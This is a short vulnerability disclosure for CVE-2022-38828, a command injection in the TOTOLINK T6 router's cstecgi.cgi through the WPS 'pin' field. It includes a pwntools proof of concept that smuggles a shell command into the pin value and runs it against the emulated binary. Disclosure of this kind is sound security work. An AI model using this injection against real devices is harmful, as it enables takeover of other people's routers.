Headline
CVE-2022-38828: CVE/setWiFiWpsStart_1.md at main · whiter6666/CVE
TOTOLINK T6 V4.1.5cu.709_B20210518 is vulnerable to command injection via cstecgi.cgi
Permalink
Command Injection****TOTOLINK_T6
version: V4.1.5cu.709_B20210518
Description:
There is a execute arbitrary command in cstecgi.cgi
Source:
you may download it from : http://www.totolink.cn/home/menu/detail.html?menu_listtpl=download&id=16&ids=36
Analyse:
in sub_421AA0, pin get from mac ,and then v7->v16->v11->v15->v13
finally execute system
POC
from pwn import *
import json
data = {
"topicurl": "setting/setWiFiWpsStart",
"wscMode": "1",
"pin": " ;ls > /tmp/1;: "
}
data = json.dumps(data)
print(data)
argv = [
"qemu-mipsel-static",
"-g", "1234",
"-L", "./root/",
"-E", "CONTENT_LENGTH={}".format(len(data)),
"-E", "REMOTE_ADDR=192.168.0.1",
"./cstecgi.cgi"
]
a = process(argv=argv)
a.sendline(data.encode())
a.interactive()